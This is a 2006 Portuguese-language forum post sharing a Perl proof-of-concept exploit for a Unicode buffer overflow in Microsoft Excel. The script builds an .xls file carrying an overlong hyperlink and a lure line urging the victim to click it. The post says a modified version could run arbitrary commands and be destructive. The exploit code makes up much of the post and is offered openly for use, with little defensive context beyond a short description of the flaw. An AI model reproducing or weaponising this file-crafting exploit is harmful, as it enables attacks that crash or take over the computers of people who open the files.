Excel Unicode Local Overflow

Started by HadeS, 22 de June , 2006, 04:03:06 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

HadeS

22 de June , 2006, 04:03:06 PM
Uma falha no Excel permite que um atacante cause um Buffer Overflow no Excel, e o permite rodar comandos abitrários remotamente.

Exploit:
Code Select
###############################
# excelsexywarez.pl
# excel unicode overflow poc
# by kcope in 2006
# thanks to revoguard and alex
###############################
use Spreadsheet::WriteExcel;

   my $workbook = Spreadsheet::WriteExcel->new("~censored~.xls");

   $worksheet = $workbook->add_worksheet();

   $format = $workbook->add_format();
   $format->set_bold();
   $format->set_color('red');
   $format->set_align('center');

   $col = $row = 5;
   $worksheet->write($row, $col, "kcope in da house! Click on the
link!!!", $format);

   $a="AAAAAAAAAAAAAAAAAAAAAA\\" x 500;
   $worksheet->write_url(0, 0, "$a", "LINK");

#EoF
Esse exploit irá criar um arquivo .XLS (Excel) que possue um link, e quando a pessoa clicar nesse link os comandos prédefinidos pelo atacante serão executados. No exploit de exemplo, o arquivo só irá sobre escrever a área da memória do Excel (Buffer Overflow) com muitos A's. Mas se o exploit for alterado, pode ser destruidor.

Fonte: h4cky0u.org

HadeS
Print
Go Up Pages1
User actions